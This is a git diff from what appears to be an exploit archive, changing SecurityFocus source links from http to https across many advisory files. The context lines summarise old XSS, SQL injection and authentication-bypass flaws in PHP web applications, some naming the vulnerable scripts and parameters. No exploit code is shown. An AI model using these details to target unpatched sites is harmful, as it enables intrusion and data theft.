HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/php/webapps/23823.txt b/exploits/php/webapps/23823.txt index 79f9366a4..086084f3d 100644 --- a/exploits/php/webapps/23823.txt +++ b/exploits/php/webapps/23823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9889/info +source: https://www.securityfocus.com/bid/9889/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'showthread.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection of HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/php/webapps/23824.txt b/exploits/php/webapps/23824.txt index 1c93b7f84..4b6a2eaeb 100644 --- a/exploits/php/webapps/23824.txt +++ b/exploits/php/webapps/23824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9890/info +source: https://www.securityfocus.com/bid/9890/info It has been reported that the Mambo 'index.php' script is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. This issue could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. diff --git a/exploits/php/webapps/23825.txt b/exploits/php/webapps/23825.txt index 319e6f742..5d5b0abda 100644 --- a/exploits/php/webapps/23825.txt +++ b/exploits/php/webapps/23825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9890/info +source: https://www.securityfocus.com/bid/9890/info It has been reported that the Mambo 'index.php' script is prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. This issue could permit a remote attacker to create a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. diff --git a/exploits/php/webapps/23834.txt b/exploits/php/webapps/23834.txt index eca2301d7..c7832f331 100644 --- a/exploits/php/webapps/23834.txt +++ b/exploits/php/webapps/23834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9891/info +source: https://www.securityfocus.com/bid/9891/info It has been reported that the Mambo 'index.php' script is prone to an SQL injection vulnerability. This issue is due to a failure of the application to properly validate user supplied URI input. diff --git a/exploits/php/webapps/23835.txt b/exploits/php/webapps/23835.txt index 56f17a59f..c26050006 100644 --- a/exploits/php/webapps/23835.txt +++ b/exploits/php/webapps/23835.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9895/info +source: https://www.securityfocus.com/bid/9895/info It has been reported that PHP-Nuke is prone to a remote admin command execution vulnerability. This issue is due to a design error that allows an attacker to specify arbitrary URI values in bbCode tags contained within posts. diff --git a/exploits/php/webapps/23843.txt b/exploits/php/webapps/23843.txt index 2666f5e40..f8b23fae9 100644 --- a/exploits/php/webapps/23843.txt +++ b/exploits/php/webapps/23843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9910/info +source: https://www.securityfocus.com/bid/9910/info It has been reported that vCard is prone to a remote authentication bypass vulnerability. This issue is due to a design error that would allow a malicious user access to certain admin functionality without having to first authenticate to the application. diff --git a/exploits/php/webapps/23844.txt b/exploits/php/webapps/23844.txt index 5ed604840..3bf57a829 100644 --- a/exploits/php/webapps/23844.txt +++ b/exploits/php/webapps/23844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9911/info +source: https://www.securityfocus.com/bid/9911/info It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors. diff --git a/exploits/php/webapps/23845.txt b/exploits/php/webapps/23845.txt index 40412d1b7..aba9a55b7 100644 --- a/exploits/php/webapps/23845.txt +++ b/exploits/php/webapps/23845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9911/info +source: https://www.securityfocus.com/bid/9911/info It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors. diff --git a/exploits/php/webapps/23865.txt b/exploits/php/webapps/23865.txt index 64be176b3..6e887b764 100644 --- a/exploits/php/webapps/23865.txt +++ b/exploits/php/webapps/23865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9940/info +source: https://www.securityfocus.com/bid/9940/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'ptivate.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection of HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/php/webapps/23866.txt b/exploits/php/webapps/23866.txt index cdf33cd2d..e1ad634ab 100644 --- a/exploits/php/webapps/23866.txt +++ b/exploits/php/webapps/23866.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9942/info +source: https://www.securityfocus.com/bid/9942/info It has been reported that phpBB may be prone to multiple vulnerabilities that could allow an attacker to carry out SQL injection and cross-site scripting attacks. These vulnerabilities result from insufficient sanitization of user-supplied input via the 'id' parameter of 'admin_smilies.php' module and the 'style_id' parameter of 'admin_styles' module. diff --git a/exploits/php/webapps/23867.txt b/exploits/php/webapps/23867.txt index 8e6fc8c23..60f462c81 100644 --- a/exploits/php/webapps/23867.txt +++ b/exploits/php/webapps/23867.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9944/info +source: https://www.securityfocus.com/bid/9944/info It has been reported that Invision Gallery may be prone to multiple sql injection vulnerabilities, allowing an attacker to influence SQL query logic. The issues exist due to insufficient sanitization of user-supplied data via the 'img', 'cat', 'sort_key', 'order_key', 'user' and 'album' parameters of the gallery module accessed via the 'index.php' script. diff --git a/exploits/php/webapps/23868.txt b/exploits/php/webapps/23868.txt index c193204b2..f3551c4a2 100644 --- a/exploits/php/webapps/23868.txt +++ b/exploits/php/webapps/23868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9945/info +source: https://www.securityfocus.com/bid/9945/info It has been reported that Top Site List may be prone to an SQL injection vulnerability that may allow remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. The issue exists due to insufficient sanitizing of the 'id' URI parameter when using the 'comments' feature in 'index.php' script. diff --git a/exploits/php/webapps/23869.txt b/exploits/php/webapps/23869.txt index 644d1103d..503089e45 100644 --- a/exploits/php/webapps/23869.txt +++ b/exploits/php/webapps/23869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9947/info +source: https://www.securityfocus.com/bid/9947/info It has been reported that MS-Analysis is prone to a multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI parameters. diff --git a/exploits/php/webapps/23870.txt b/exploits/php/webapps/23870.txt index 7a6640afd..61f9aaf95 100644 --- a/exploits/php/webapps/23870.txt +++ b/exploits/php/webapps/23870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9948/info +source: https://www.securityfocus.com/bid/9948/info Reportedly the MS-Analysis module is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user supplied HTTP header input before using it in an SQL query. diff --git a/exploits/php/webapps/23885.txt b/exploits/php/webapps/23885.txt index a431a8438..6e217e641 100644 --- a/exploits/php/webapps/23885.txt +++ b/exploits/php/webapps/23885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9994/info +source: https://www.securityfocus.com/bid/9994/info Multiple SQL injection, cross-site scripting and HTML injection vulnerabilities have been identified in the application, which may allow an attacker to execute arbitrary HTML or script code in a user's browser and/or influence SQL query logic to disclose sensitive information and carry out other attacks. diff --git a/exploits/php/webapps/23908.txt b/exploits/php/webapps/23908.txt index 331601040..17b79d893 100644 --- a/exploits/php/webapps/23908.txt +++ b/exploits/php/webapps/23908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10044/info +source: https://www.securityfocus.com/bid/10044/info It has been reported that OpenBB is prone to a vulnerability that may allow malicious users to influence SQL queries of the affected application. This issue is due to a failure of the application to properly sanitize user-supplied URI data. diff --git a/exploits/php/webapps/23928.txt b/exploits/php/webapps/23928.txt index 96e57f22f..1f376208e 100644 --- a/exploits/php/webapps/23928.txt +++ b/exploits/php/webapps/23928.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23929.txt b/exploits/php/webapps/23929.txt index d26f10532..9b8291a25 100644 --- a/exploits/php/webapps/23929.txt +++ b/exploits/php/webapps/23929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23930.txt b/exploits/php/webapps/23930.txt index 43fd6d39c..2fd70dfb4 100644 --- a/exploits/php/webapps/23930.txt +++ b/exploits/php/webapps/23930.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23931.txt b/exploits/php/webapps/23931.txt index 7403ad501..2d42cdc3c 100644 --- a/exploits/php/webapps/23931.txt +++ b/exploits/php/webapps/23931.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23932.txt b/exploits/php/webapps/23932.txt index 1bb9c39c1..50e54abb2 100644 --- a/exploits/php/webapps/23932.txt +++ b/exploits/php/webapps/23932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23933.txt b/exploits/php/webapps/23933.txt index df925bbd0..d6c79ac46 100644 --- a/exploits/php/webapps/23933.txt +++ b/exploits/php/webapps/23933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10082/info +source: https://www.securityfocus.com/bid/10082/info NukeCalendar, which is a third-party calendar module for PHP-Nuke, is prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/23934.txt b/exploits/php/webapps/23934.txt index 911071f7b..8d57375a6 100644 --- a/exploits/php/webapps/23934.txt +++ b/exploits/php/webapps/23934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10084/info +source: https://www.securityfocus.com/bid/10084/info Multiple cross-site scripting vulnerabilities have been reported in AzDGDatingLite. These issues may be exploited by enticing a victim user to visit a malicious link that includes hostile HTML and script code. diff --git a/exploits/php/webapps/23935.txt b/exploits/php/webapps/23935.txt index 20012aa27..07474e62c 100644 --- a/exploits/php/webapps/23935.txt +++ b/exploits/php/webapps/23935.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10084/info +source: https://www.securityfocus.com/bid/10084/info Multiple cross-site scripting vulnerabilities have been reported in AzDGDatingLite. These issues may be exploited by enticing a victim user to visit a malicious link that includes hostile HTML and script code. diff --git a/exploits/php/webapps/23947.txt b/exploits/php/webapps/23947.txt index c2c1d2e6d..9e57df4b5 100644 --- a/exploits/php/webapps/23947.txt +++ b/exploits/php/webapps/23947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23948.txt b/exploits/php/webapps/23948.txt index f327f7dc4..b2c039a18 100644 --- a/exploits/php/webapps/23948.txt +++ b/exploits/php/webapps/23948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23949.txt b/exploits/php/webapps/23949.txt index 3f024c20e..33365fd41 100644 --- a/exploits/php/webapps/23949.txt +++ b/exploits/php/webapps/23949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23950.txt b/exploits/php/webapps/23950.txt index 1ed679808..95b94b92a 100644 --- a/exploits/php/webapps/23950.txt +++ b/exploits/php/webapps/23950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23951.txt b/exploits/php/webapps/23951.txt index 19d23bef6..1b19ac4a0 100644 --- a/exploits/php/webapps/23951.txt +++ b/exploits/php/webapps/23951.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23952.txt b/exploits/php/webapps/23952.txt index 24235d68a..9b5a03797 100644 --- a/exploits/php/webapps/23952.txt +++ b/exploits/php/webapps/23952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23953.txt b/exploits/php/webapps/23953.txt index 297156f50..f9baa318c 100644 --- a/exploits/php/webapps/23953.txt +++ b/exploits/php/webapps/23953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23954.txt b/exploits/php/webapps/23954.txt index 3ec64a04e..c591bb512 100644 --- a/exploits/php/webapps/23954.txt +++ b/exploits/php/webapps/23954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23955.txt b/exploits/php/webapps/23955.txt index 562792102..4d37dece1 100644 --- a/exploits/php/webapps/23955.txt +++ b/exploits/php/webapps/23955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23956.txt b/exploits/php/webapps/23956.txt index 450d7a886..437c9acdb 100644 --- a/exploits/php/webapps/23956.txt +++ b/exploits/php/webapps/23956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23957.txt b/exploits/php/webapps/23957.txt index 9b484fff1..9248e99c2 100644 --- a/exploits/php/webapps/23957.txt +++ b/exploits/php/webapps/23957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23958.txt b/exploits/php/webapps/23958.txt index d66644b30..fa3284533 100644 --- a/exploits/php/webapps/23958.txt +++ b/exploits/php/webapps/23958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23959.txt b/exploits/php/webapps/23959.txt index f1a02475d..8bb723bbb 100644 --- a/exploits/php/webapps/23959.txt +++ b/exploits/php/webapps/23959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23960.txt b/exploits/php/webapps/23960.txt index 127a805e0..7d7035814 100644 --- a/exploits/php/webapps/23960.txt +++ b/exploits/php/webapps/23960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23961.txt b/exploits/php/webapps/23961.txt index 1f005727d..b03f3e5fb 100644 --- a/exploits/php/webapps/23961.txt +++ b/exploits/php/webapps/23961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23962.txt b/exploits/php/webapps/23962.txt index d1b555781..4011dc138 100644 --- a/exploits/php/webapps/23962.txt +++ b/exploits/php/webapps/23962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23963.txt b/exploits/php/webapps/23963.txt index 081fd282f..5b7f6920c 100644 --- a/exploits/php/webapps/23963.txt +++ b/exploits/php/webapps/23963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23964.txt b/exploits/php/webapps/23964.txt index b4e63312c..b09243db6 100644 --- a/exploits/php/webapps/23964.txt +++ b/exploits/php/webapps/23964.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23965.txt b/exploits/php/webapps/23965.txt index cdff9748c..f3611c5c6 100644 --- a/exploits/php/webapps/23965.txt +++ b/exploits/php/webapps/23965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23966.txt b/exploits/php/webapps/23966.txt index cdc9f5a69..8c046070a 100644 --- a/exploits/php/webapps/23966.txt +++ b/exploits/php/webapps/23966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23971.txt b/exploits/php/webapps/23971.txt index 496659305..e37f22532 100644 --- a/exploits/php/webapps/23971.txt +++ b/exploits/php/webapps/23971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23972.txt b/exploits/php/webapps/23972.txt index a58989e9a..292f3353c 100644 --- a/exploits/php/webapps/23972.txt +++ b/exploits/php/webapps/23972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23973.txt b/exploits/php/webapps/23973.txt index 67c9ff2df..b639cb725 100644 --- a/exploits/php/webapps/23973.txt +++ b/exploits/php/webapps/23973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23974.txt b/exploits/php/webapps/23974.txt index 828272b9b..193c82799 100644 --- a/exploits/php/webapps/23974.txt +++ b/exploits/php/webapps/23974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23975.txt b/exploits/php/webapps/23975.txt index 20dad187f..87903f8c5 100644 --- a/exploits/php/webapps/23975.txt +++ b/exploits/php/webapps/23975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23976.txt b/exploits/php/webapps/23976.txt index bb7b706bf..f35533bc1 100644 --- a/exploits/php/webapps/23976.txt +++ b/exploits/php/webapps/23976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23977.txt b/exploits/php/webapps/23977.txt index 8d30e56bc..2ba1d6cb5 100644 --- a/exploits/php/webapps/23977.txt +++ b/exploits/php/webapps/23977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23978.txt b/exploits/php/webapps/23978.txt index cd4199125..c70e1714a 100644 --- a/exploits/php/webapps/23978.txt +++ b/exploits/php/webapps/23978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23982.txt b/exploits/php/webapps/23982.txt index 20834bd9a..4cb4ba5a8 100644 --- a/exploits/php/webapps/23982.txt +++ b/exploits/php/webapps/23982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23983.txt b/exploits/php/webapps/23983.txt index 7ee27db55..6fe97205e 100644 --- a/exploits/php/webapps/23983.txt +++ b/exploits/php/webapps/23983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23984.txt b/exploits/php/webapps/23984.txt index e09159783..3b5128385 100644 --- a/exploits/php/webapps/23984.txt +++ b/exploits/php/webapps/23984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10100/info +source: https://www.securityfocus.com/bid/10100/info Multiple vulnerabilities have been identified in various modules of the application. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload. diff --git a/exploits/php/webapps/23988.txt b/exploits/php/webapps/23988.txt index 1d4581812..acbbd0036 100644 --- a/exploits/php/webapps/23988.txt +++ b/exploits/php/webapps/23988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10104/info +source: https://www.securityfocus.com/bid/10104/info Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability. diff --git a/exploits/php/webapps/23990.txt b/exploits/php/webapps/23990.txt index 015fd80dd..f83ee4f9f 100644 --- a/exploits/php/webapps/23990.txt +++ b/exploits/php/webapps/23990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10128/info +source: https://www.securityfocus.com/bid/10128/info Reportedly PHP-NuKe is prone to a remote cross-site scripting vulnerability. This issue is due to a failure of the 'cookiedecode()' function to properly sanitize user supplied cookie parameters. diff --git a/exploits/php/webapps/23991.txt b/exploits/php/webapps/23991.txt index c3b08751f..a0c6a63e7 100644 --- a/exploits/php/webapps/23991.txt +++ b/exploits/php/webapps/23991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10129/info +source: https://www.securityfocus.com/bid/10129/info Multiple vulnerabilities have been identified in various modules of TUTOS. These vulnerabilities may allow a remote attacker to carry out various attacks such as path disclosure, cross-site scripting, and possibly SQL injection. diff --git a/exploits/php/webapps/23998.txt b/exploits/php/webapps/23998.txt index 1c9eb85fc..cee20a67e 100644 --- a/exploits/php/webapps/23998.txt +++ b/exploits/php/webapps/23998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10135/info +source: https://www.securityfocus.com/bid/10135/info Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24003.txt b/exploits/php/webapps/24003.txt index 4fc2720fa..895363f84 100644 --- a/exploits/php/webapps/24003.txt +++ b/exploits/php/webapps/24003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24004.txt b/exploits/php/webapps/24004.txt index 79395294a..5ea19db57 100644 --- a/exploits/php/webapps/24004.txt +++ b/exploits/php/webapps/24004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24005.txt b/exploits/php/webapps/24005.txt index 5e5b126ea..e1d47008a 100644 --- a/exploits/php/webapps/24005.txt +++ b/exploits/php/webapps/24005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info +source: https://www.securityfocus.com/bid/10153/info Reportedly phpBugTracker contains multiple input validation vulnerabilities; it is prone to multiple SQL injection, cross-site scripting and HTML injection issues. These issues are all due to a failure of the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/24006.txt b/exploits/php/webapps/24006.txt index 81a896130..43dc891af 100644 --- a/exploits/php/webapps/24006.txt +++ b/exploits/php/webapps/24006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10153/info 